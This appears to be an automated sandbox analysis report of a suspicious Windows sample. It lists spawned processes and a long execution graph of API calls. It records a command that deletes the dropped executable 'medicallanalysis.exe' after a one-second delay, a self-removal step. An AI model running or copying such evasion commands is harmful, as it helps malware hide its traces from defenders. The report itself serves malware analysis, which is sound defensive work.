                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                              Commandline:"cmd.exe" /C timeout 1 && del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe"
                                                                                                                                                                                                                                                                                                              Imagebase:0x790000
                                                                                                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                                                                                                              Start time:17:54:32
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                                                                                                              Start time:17:54:32
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                              Commandline:timeout 1
                                                                                                                                                                                                                                                                                                              Imagebase:0x3f0000
                                                                                                                                                                                                                                                                                                              File size:25'088 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                                                                                                              Start time:17:54:34
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                                                                                                                              Start time:17:54:47
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                              Commandline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr34F8.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/446d3de0/c462449b"
                                                                                                                                                                                                                                                                                                              Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                                                                                                                              Start time:17:54:48
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2864 --field-trial-handle=2760,i,8911409876451875060,10497288921933201454,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                              Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                                                                                                                                              Start time:17:54:50
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                              Commandline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr417C.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/446d3de0/c7af6c55"
                                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                                                                                                                              Start time:17:54:53
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3232 --field-trial-handle=2952,i,15376106981167102888,3693365573348808806,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                                                                                                                              Start time:17:55:09
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Program Files\Windows Media Player\wmplayer.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Windows Media Player\wmplayer.exe"
                                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7e0b30000
                                                                                                                                                                                                                                                                                                              File size:171'008 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:89DCD2D4C0EC638AADC00D3530E07E1D
                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                                Execution Coverage:16.6%
                                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                Signature Coverage:20.3%
                                                                                                                                                                                                                                                                                                                Total number of Nodes:1480
                                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:41
                                                                                                                                                                                                                                                                                                                execution_graph 4118 402fc0 4119 401446 18 API calls 4118->4119 4120 402fc7 4119->4120 4121 401a13 4120->4121 4122 403017 4120->4122 4123 40300a 4120->4123 4125 406831 18 API calls 4122->4125 4124 401446 18 API calls 4123->4124 4124->4121 4125->4121 4126 4023c1 4127 40145c 18 API calls 4126->4127 4128 4023c8 4127->4128 4131 407296 4128->4131 4134 406efe CreateFileW 4131->4134 4135 406f30 4134->4135 4136 406f4a ReadFile 4134->4136 4137 4062cf 11 API calls 4135->4137 4138 4023d6 4136->4138 4141 406fb0 4136->4141 4137->4138 4139 406fc7 ReadFile lstrcpynA lstrcmpA 4139->4141 4142 40700e SetFilePointer ReadFile 4139->4142 4140 40720f CloseHandle 4140->4138 4141->4138 4141->4139 4141->4140 4143 407009 4141->4143 4142->4140 4144 4070d4 ReadFile 4142->4144 4143->4140 4145 407164 4144->4145 4145->4143 4145->4144 4146 40718b SetFilePointer GlobalAlloc ReadFile 4145->4146 4147 4071eb lstrcpynW GlobalFree 4146->4147 4148 4071cf 4146->4148 4147->4140 4148->4147 4148->4148 4149 401cc3 4150 40145c 18 API calls 4149->4150 4151 401cca lstrlenW 4150->4151 4152 4030dc 4151->4152 4153 4030e3 4152->4153 4155 405f7d wsprintfW 4152->4155 4155->4153 4156 401c46 4157 40145c 18 API calls 4156->4157 4158 401c4c 4157->4158 4159 4062cf 11 API calls 4158->4159 4160 401c59 4159->4160 4161 406cc7 81 API calls 4160->4161 4162 401c64 4161->4162 4163 403049 4164 401446 18 API calls 4163->4164 4165 403050 4164->4165 4166 406831 18 API calls 4165->4166 4167 401a13 4165->4167 4166->4167 4168 40204a 4169 401446 18 API calls 4168->4169 4170 402051 IsWindow 4169->4170 4171 4018d3 4170->4171 4172 40324c 4173 403277 4172->4173 4174 40325e SetTimer 4172->4174 4175 4032cc 4173->4175 4176 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4173->4176 4174->4173 4176->4175 4177 4022cc 4178 40145c 18 API calls 4177->4178 4179 4022d3 4178->4179 4180 406301 2 API calls 4179->4180 4181 4022d9 4180->4181 4183 4022e8 4181->4183 4186 405f7d wsprintfW 4181->4186 4184 4030e3 4183->4184 4187 405f7d wsprintfW 4183->4187 4186->4183 4187->4184 4188 4030cf 4189 40145c 18 API calls 4188->4189 4190 4030d6 4189->4190 4192 4030dc 4190->4192 4195 4063d8 GlobalAlloc lstrlenW 4190->4195 4193 4030e3 4192->4193 4222 405f7d wsprintfW 4192->4222 4196 406460 4195->4196 4197 40640e 4195->4197 4196->4192 4198 40643b GetVersionExW 4197->4198 4223 406057 CharUpperW 4197->4223 4198->4196 4199 40646a 4198->4199 4200 406490 LoadLibraryA 4199->4200 4201 406479 4199->4201 4200->4196 4204 4064ae GetProcAddress GetProcAddress GetProcAddress 4200->4204 4201->4196 4203 4065b1 GlobalFree 4201->4203 4205 4065c7 LoadLibraryA 4203->4205 4206 406709 FreeLibrary 4203->4206 4207 406621 4204->4207 4211 4064d6 4204->4211 4205->4196 4209 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4205->4209 4206->4196 4208 40667d FreeLibrary 4207->4208 4210 406656 4207->4210 4208->4210 4209->4207 4214 406716 4210->4214 4219 4066b1 lstrcmpW 4210->4219 4220 4066e2 CloseHandle 4210->4220 4221 406700 CloseHandle 4210->4221 4211->4207 4212 406516 4211->4212 4213 4064fa FreeLibrary GlobalFree 4211->4213 4212->4203 4215 406528 lstrcpyW OpenProcess 4212->4215 4217 40657b CloseHandle CharUpperW lstrcmpW 4212->4217 4213->4196 4216 40671b CloseHandle FreeLibrary 4214->4216 4215->4212 4215->4217 4218 406730 CloseHandle 4216->4218 4217->4207 4217->4212 4218->4216 4219->4210 4219->4218 4220->4210 4221->4206 4222->4193 4223->4197 4224 4044d1 4225 40450b 4224->4225 4226 40453e 4224->4226 4292 405cb0 GetDlgItemTextW 4225->4292 4227 40454b GetDlgItem GetAsyncKeyState 4226->4227 4231 4045dd 4226->4231 4229 40456a GetDlgItem 4227->4229 4242 404588 4227->4242 4293 403d6b 4229->4293 4230 4046c9 4290 40485f 4230->4290 4297 405cb0 GetDlgItemTextW 4230->4297 4231->4230 4239 406831 18 API calls 4231->4239 4231->4290 4232 404516 4233 406064 5 API calls 4232->4233 4235 40451c 4233->4235 4238 403ea0 5 API calls 4235->4238 4237 40457d ShowWindow 4237->4242 4243 404521 GetDlgItem 4238->4243 4244 40465b SHBrowseForFolderW 4239->4244 4240 4046f5 4245 4067aa 18 API calls 4240->4245 4247 4045a5 SetWindowTextW 4242->4247 4251 405d85 4 API calls 4242->4251 4248 40452f IsDlgButtonChecked 4243->4248 4243->4290 4244->4230 4250 404673 CoTaskMemFree 4244->4250 4255 4046fb 4245->4255 4249 403d6b 19 API calls 4247->4249 4248->4226 4253 4045c3 4249->4253 4254 40674e 3 API calls 4250->4254 4252 40459b 4251->4252 4252->4247 4259 40674e 3 API calls 4252->4259 4256 403d6b 19 API calls 4253->4256 4257 404680 4254->4257 4298 406035 lstrcpynW 4255->4298 4260 4045ce 4256->4260 4261 4046b7 SetDlgItemTextW 4257->4261 4266 406831 18 API calls 4257->4266 4259->4247 4296 403dc4 SendMessageW 4260->4296 4261->4230 4262 404712 4264 406328 3 API calls 4262->4264 4273 40471a 4264->4273 4265 4045d6 4267 406328 3 API calls 4265->4267 4268 40469f lstrcmpiW 4266->4268 4267->4231 4268->4261 4271 4046b0 lstrcatW 4268->4271 4269 40475c 4299 406035 lstrcpynW 4269->4299 4271->4261 4272 404765 4274 405d85 4 API calls 4272->4274 4273->4269 4277 40677d 2 API calls 4273->4277 4279 4047b1 4273->4279 4275 40476b GetDiskFreeSpaceW 4274->4275 4278 40478f MulDiv 4275->4278 4275->4279 4277->4273 4278->4279 4280 40480e 4279->4280 4300 4043d9 4279->4300 4281 404831 4280->4281 4283 40141d 80 API calls 4280->4283 4308 403db1 EnableWindow 4281->4308 4283->4281 4284 4047ff 4286 404810 SetDlgItemTextW 4284->4286 4287 404804 4284->4287 4286->4280 4289 4043d9 21 API calls 4287->4289 4288 40484d 4288->4290 4309 403d8d 4288->4309 4289->4280 4312 403df6 4290->4312 4292->4232 4294 406831 18 API calls 4293->4294 4295 403d76 SetDlgItemTextW 4294->4295 4295->4237 4296->4265 4297->4240 4298->4262 4299->4272 4301 4043f9 4300->4301 4302 406831 18 API calls 4301->4302 4303 404439 4302->4303 4304 406831 18 API calls 4303->4304 4305 404444 4304->4305 4306 406831 18 API calls 4305->4306 4307 404454 lstrlenW wsprintfW SetDlgItemTextW 4306->4307 4307->4284 4308->4288 4310 403da0 SendMessageW 4309->4310 4311 403d9b 4309->4311 4310->4290 4311->4310 4313 403e0b GetWindowLongW 4312->4313 4323 403e94 4312->4323 4314 403e1c 4313->4314 4313->4323 4315 403e2b GetSysColor 4314->4315 4316 403e2e 4314->4316 4315->4316 4317 403e34 SetTextColor 4316->4317 4318 403e3e SetBkMode 4316->4318 4317->4318 4319 403e56 GetSysColor 4318->4319 4320 403e5c 4318->4320 4319->4320 4321 403e63 SetBkColor 4320->4321 4322 403e6d 4320->4322 4321->4322 4322->4323 4324 403e80 DeleteObject 4322->4324 4325 403e87 CreateBrushIndirect 4322->4325 4324->4325 4325->4323 4326 401dd3 4327 401446 18 API calls 4326->4327 4328 401dda 4327->4328 4329 401446 18 API calls 4328->4329 4330 4018d3 4329->4330 3634 402e55 3635 40145c 18 API calls 3634->3635 3636 402e63 3635->3636 3637 402e79 3636->3637 3638 40145c 18 API calls 3636->3638 3639 405e5c 2 API calls 3637->3639 3638->3637 3640 402e7f 3639->3640 3664 405e7c GetFileAttributesW CreateFileW 3640->3664 3642 402e8c 3643 402f35 3642->3643 3644 402e98 GlobalAlloc 3642->3644 3647 4062cf 11 API calls 3643->3647 3645 402eb1 3644->3645 3646 402f2c CloseHandle 3644->3646 3665 403368 SetFilePointer 3645->3665 3646->3643 3649 402f45 3647->3649 3651 402f50 DeleteFileW 3649->3651 3652 402f63 3649->3652 3650 402eb7 3653 403336 ReadFile 3650->3653 3651->3652 3654 401435 25 API calls 3652->3654 3655 402ec0 GlobalAlloc 3653->3655 3661 402f69 3654->3661 3656 402ed0 3655->3656 3657 402f04 WriteFile GlobalFree 3655->3657 3659 40337f 33 API calls 3656->3659 3658 40337f 33 API calls 3657->3658 3660 402f29 3658->3660 3663 402edd 3659->3663 3660->3646 3662 402efb GlobalFree 3662->3657 3663->3662 3664->3642 3665->3650 4331 401cd5 4332 401446 18 API calls 4331->4332 4333 401cdd 4332->4333 4334 401446 18 API calls 4333->4334 4335 401ce8 4334->4335 4336 40145c 18 API calls 4335->4336 4337 401cf1 4336->4337 4338 401d07 lstrlenW 4337->4338 4339 401d43 4337->4339 4340 401d11 4338->4340 4340->4339 4344 406035 lstrcpynW 4340->4344 4342 401d2c 4342->4339 4343 401d39 lstrlenW 4342->4343 4343->4339 4344->4342 4345 402cd7 4346 401446 18 API calls 4345->4346 4348 402c64 4346->4348 4347 402d17 ReadFile 4347->4348 4348->4345 4348->4347 4349 402d99 4348->4349 4350 402dd8 4351 4030e3 4350->4351 4352 402ddf 4350->4352 4353 402de5 FindClose 4352->4353 4353->4351 4354 401d5c 4355 40145c 18 API calls 4354->4355 4356 401d63 4355->4356 4357 40145c 18 API calls 4356->4357 4358 401d6c 4357->4358 4359 401d73 lstrcmpiW 4358->4359 4360 401d86 lstrcmpW 4358->4360 4361 401d79 4359->4361 4360->4361 4362 401c99 4360->4362 4361->4360 4361->4362 4363 4027e3 4364 4027e9 4363->4364 4365 4027f2 4364->4365 4366 402836 4364->4366 4379 401553 4365->4379 4367 40145c 18 API calls 4366->4367 4369 40283d 4367->4369 4371 4062cf 11 API calls 4369->4371 4370 4027f9 4372 40145c 18 API calls 4370->4372 4377 401a13 4370->4377 4373 40284d 4371->4373 4374 40280a RegDeleteValueW 4372->4374 4383 40149d RegOpenKeyExW 4373->4383 4375 4062cf 11 API calls 4374->4375 4378 40282a RegCloseKey 4375->4378 4378->4377 4380 401563 4379->4380 4381 40145c 18 API calls 4380->4381 4382 401589 RegOpenKeyExW 4381->4382 4382->4370 4386 4014c9 4383->4386 4391 401515 4383->4391 4384 4014ef RegEnumKeyW 4385 401501 RegCloseKey 4384->4385 4384->4386 4388 406328 3 API calls 4385->4388 4386->4384 4386->4385 4387 401526 RegCloseKey 4386->4387 4389 40149d 3 API calls 4386->4389 4387->4391 4390 401511 4388->4390 4389->4386 4390->4391 4392 401541 RegDeleteKeyW 4390->4392 4391->4377 4392->4391 4393 4040e4 4394 4040ff 4393->4394 4400 40422d 4393->4400 4396 40413a 4394->4396 4424 403ff6 WideCharToMultiByte 4394->4424 4395 404298 4397 40436a 4395->4397 4398 4042a2 GetDlgItem 4395->4398 4404 403d6b 19 API calls 4396->4404 4405 403df6 8 API calls 4397->4405 4401 40432b 4398->4401 4402 4042bc 4398->4402 4400->4395 4400->4397 4403 404267 GetDlgItem SendMessageW 4400->4403 4401->4397 4406 40433d 4401->4406 4402->4401 4410 4042e2 6 API calls 4402->4410 4429 403db1 EnableWindow 4403->4429 4408 40417a 4404->4408 4409 404365 4405->4409 4411 404353 4406->4411 4412 404343 SendMessageW 4406->4412 4414 403d6b 19 API calls 4408->4414 4410->4401 4411->4409 4415 404359 SendMessageW 4411->4415 4412->4411 4413 404293 4416 403d8d SendMessageW 4413->4416 4417 404187 CheckDlgButton 4414->4417 4415->4409 4416->4395 4427 403db1 EnableWindow 4417->4427 4419 4041a5 GetDlgItem 4428 403dc4 SendMessageW 4419->4428 4421 4041bb SendMessageW 4422 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4421->4422 4423 4041d8 GetSysColor 4421->4423 4422->4409 4423->4422 4425 404033 4424->4425 4426 404015 GlobalAlloc WideCharToMultiByte 4424->4426 4425->4396 4426->4425 4427->4419 4428->4421 4429->4413 4430 402ae4 4431 4030e3 4430->4431 4432 402aeb 4430->4432 4433 402af2 CloseHandle 4432->4433 4433->4431 4434 402065 4435 401446 18 API calls 4434->4435 4436 40206d 4435->4436 4437 401446 18 API calls 4436->4437 4438 402076 GetDlgItem 4437->4438 4439 4030dc 4438->4439 4440 4030e3 4439->4440 4442 405f7d wsprintfW 4439->4442 4442->4440 4443 402665 4444 40145c 18 API calls 4443->4444 4445 40266b 4444->4445 4446 40145c 18 API calls 4445->4446 4447 402674 4446->4447 4448 40145c 18 API calls 4447->4448 4449 40267d 4448->4449 4450 4062cf 11 API calls 4449->4450 4451 40268c 4450->4451 4452 406301 2 API calls 4451->4452 4453 402695 4452->4453 4454 4026a6 lstrlenW lstrlenW 4453->4454 4456 404f9e 25 API calls 4453->4456 4458 4030e3 4453->4458 4455 404f9e 25 API calls 4454->4455 4457 4026e8 SHFileOperationW 4455->4457 4456->4453 4457->4453 4457->4458 4459 401c69 4460 40145c 18 API calls 4459->4460 4461 401c70 4460->4461 4462 4062cf 11 API calls 4461->4462 4463 401c80 4462->4463 4464 405ccc MessageBoxIndirectW 4463->4464 4465 401a13 4464->4465 4466 402f6e 4467 402f72 4466->4467 4468 402fae 4466->4468 4470 4062cf 11 API calls 4467->4470 4469 40145c 18 API calls 4468->4469 4476 402f9d 4469->4476 4471 402f7d 4470->4471 4472 4062cf 11 API calls 4471->4472 4473 402f90 4472->4473 4474 402fa2 4473->4474 4475 402f98 4473->4475 4478 406113 9 API calls 4474->4478 4477 403ea0 5 API calls 4475->4477 4477->4476 4478->4476 3338 4023f0 3339 402403 3338->3339 3340 4024da 3338->3340 3362 40145c 3339->3362 3342 404f9e 25 API calls 3340->3342 3348 4024f1 3342->3348 3344 40145c 18 API calls 3345 402413 3344->3345 3346 402429 LoadLibraryExW 3345->3346 3347 40241b GetModuleHandleW 3345->3347 3349 4024ce 3346->3349 3350 40243e 3346->3350 3347->3346 3347->3350 3352 404f9e 25 API calls 3349->3352 3367 406391 GlobalAlloc WideCharToMultiByte 3350->3367 3352->3340 3353 402449 3354 40248c 3353->3354 3355 40244f 3353->3355 3373 404f9e 3354->3373 3360 40245f 3355->3360 3370 401435 3355->3370 3360->3348 3361 4024c0 FreeLibrary 3360->3361 3361->3348 3387 406831 3362->3387 3365 401497 3365->3344 3368 4063c9 GlobalFree 3367->3368 3369 4063bc GetProcAddress 3367->3369 3368->3353 3369->3368 3371 404f9e 25 API calls 3370->3371 3372 401443 3371->3372 3372->3360 3374 404fb7 3373->3374 3375 402496 3373->3375 3376 404fd5 lstrlenW 3374->3376 3377 406831 18 API calls 3374->3377 3384 4062cf lstrlenW wvsprintfW 3375->3384 3378 404fe3 lstrlenW 3376->3378 3379 404ffe 3376->3379 3377->3376 3378->3375 3380 404ff5 lstrcatW 3378->3380 3381 405011 3379->3381 3382 405004 SetWindowTextW 3379->3382 3380->3379 3381->3375 3383 405017 SendMessageW SendMessageW SendMessageW 3381->3383 3382->3381 3383->3375 3426 406113 3384->3426 3403 40683e 3387->3403 3388 406aab 3389 401488 3388->3389 3421 406035 lstrcpynW 3388->3421 3389->3365 3405 406064 3389->3405 3391 4068ff GetVersion 3391->3403 3392 406a72 lstrlenW 3392->3403 3394 406831 10 API calls 3394->3392 3397 40697e GetSystemDirectoryW 3397->3403 3398 406064 5 API calls 3398->3403 3399 406991 GetWindowsDirectoryW 3399->3403 3400 406831 10 API calls 3400->3403 3401 406a0b lstrcatW 3401->3403 3402 4069c5 SHGetSpecialFolderLocation 3402->3403 3404 4069dd SHGetPathFromIDListW CoTaskMemFree 3402->3404 3403->3388 3403->3391 3403->3392 3403->3394 3403->3397 3403->3398 3403->3399 3403->3400 3403->3401 3403->3402 3414 405eff RegOpenKeyExW 3403->3414 3419 405f7d wsprintfW 3403->3419 3420 406035 lstrcpynW 3403->3420 3404->3403 3412 406071 3405->3412 3406 4060e7 3407 4060ed CharPrevW 3406->3407 3409 40610d 3406->3409 3407->3406 3408 4060da CharNextW 3408->3406 3408->3412 3409->3365 3411 4060c6 CharNextW 3411->3412 3412->3406 3412->3408 3412->3411 3413 4060d5 CharNextW 3412->3413 3422 405d32 3412->3422 3413->3408 3415 405f33 RegQueryValueExW 3414->3415 3416 405f78 3414->3416 3417 405f55 RegCloseKey 3415->3417 3416->3403 3417->3416 3419->3403 3420->3403 3421->3389 3423 405d38 3422->3423 3424 405d4e 3423->3424 3425 405d3f CharNextW 3423->3425 3424->3412 3425->3423 3427 40613c 3426->3427 3428 40611f 3426->3428 3429 406130 3427->3429 3431 4061b3 3427->3431 3432 406159 3427->3432 3428->3429 3430 406129 CloseHandle 3428->3430 3429->3360 3430->3429 3431->3429 3434 4061bc lstrcatW lstrlenW WriteFile 3431->3434 3433 406162 GetFileAttributesW 3432->3433 3432->3434 3439 405e7c GetFileAttributesW CreateFileW 3433->3439 3434->3429 3436 40617e 3436->3429 3437 4061a8 SetFilePointer 3436->3437 3438 40618e WriteFile 3436->3438 3437->3431 3438->3437 3439->3436 4479 402175 4480 401446 18 API calls 4479->4480 4481 40217c 4480->4481 4482 401446 18 API calls 4481->4482 4483 402186 4482->4483 4484 402197 4483->4484 4487 4062cf 11 API calls 4483->4487 4485 4021aa EnableWindow 4484->4485 4486 40219f ShowWindow 4484->4486 4488 4030e3 4485->4488 4486->4488 4487->4484 4489 4048f8 4490 404906 4489->4490 4491 40491d 4489->4491 4492 40490c 4490->4492 4507 404986 4490->4507 4493 40492b IsWindowVisible 4491->4493 4499 404942 4491->4499 4494 403ddb SendMessageW 4492->4494 4496 404938 4493->4496 4493->4507 4497 404916 4494->4497 4495 40498c CallWindowProcW 4495->4497 4508 40487a SendMessageW 4496->4508 4499->4495 4513 406035 lstrcpynW 4499->4513 4501 404971 4514 405f7d wsprintfW 4501->4514 4503 404978 4504 40141d 80 API calls 4503->4504 4505 40497f 4504->4505 4515 406035 lstrcpynW 4505->4515 4507->4495 4509 4048d7 SendMessageW 4508->4509 4510 40489d GetMessagePos ScreenToClient SendMessageW 4508->4510 4512 4048cf 4509->4512 4511 4048d4 4510->4511 4510->4512 4511->4509 4512->4499 4513->4501 4514->4503 4515->4507 4516 4050f9 4517 4052c1 4516->4517 4518 40511a GetDlgItem GetDlgItem GetDlgItem 4516->4518 4519 4052f2 4517->4519 4520 4052ca GetDlgItem CreateThread CloseHandle 4517->4520 4565 403dc4 SendMessageW 4518->4565 4522 405320 4519->4522 4524 405342 4519->4524 4525 40530c ShowWindow ShowWindow 4519->4525 4520->4519 4526 40537e 4522->4526 4528 405331 4522->4528 4529 405357 ShowWindow 4522->4529 4523 40518e 4535 406831 18 API calls 4523->4535 4530 403df6 8 API calls 4524->4530 4567 403dc4 SendMessageW 4525->4567 4526->4524 4531 405389 SendMessageW 4526->4531 4568 403d44 4528->4568 4533 405377 4529->4533 4534 405369 4529->4534 4540 4052ba 4530->4540 4539 4053a2 CreatePopupMenu 4531->4539 4531->4540 4538 403d44 SendMessageW 4533->4538 4536 404f9e 25 API calls 4534->4536 4537 4051ad 4535->4537 4536->4533 4541 4062cf 11 API calls 4537->4541 4538->4526 4542 406831 18 API calls 4539->4542 4543 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4541->4543 4544 4053b2 AppendMenuW 4542->4544 4545 405203 SendMessageW SendMessageW 4543->4545 4546 40521f 4543->4546 4547 4053c5 GetWindowRect 4544->4547 4548 4053d8 4544->4548 4545->4546 4549 405232 4546->4549 4550 405224 SendMessageW 4546->4550 4551 4053df TrackPopupMenu 4547->4551 4548->4551 4552 403d6b 19 API calls 4549->4552 4550->4549 4551->4540 4553 4053fd 4551->4553 4554 405242 4552->4554 4555 405419 SendMessageW 4553->4555 4556 40524b ShowWindow 4554->4556 4557 40527f GetDlgItem SendMessageW 4554->4557 4555->4555 4558 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4555->4558 4559 405261 ShowWindow 4556->4559 4560 40526e 4556->4560 4557->4540 4561 4052a2 SendMessageW SendMessageW 4557->4561 4562 40545b SendMessageW 4558->4562 4559->4560 4566 403dc4 SendMessageW 4560->4566 4561->4540 4562->4562 4563 405486 GlobalUnlock SetClipboardData CloseClipboard 4562->4563 4563->4540 4565->4523 4566->4557 4567->4522 4569 403d51 SendMessageW 4568->4569 4570 403d4b 4568->4570 4569->4524 4570->4569 4571 4020f9 GetDC GetDeviceCaps 4572 401446 18 API calls 4571->4572 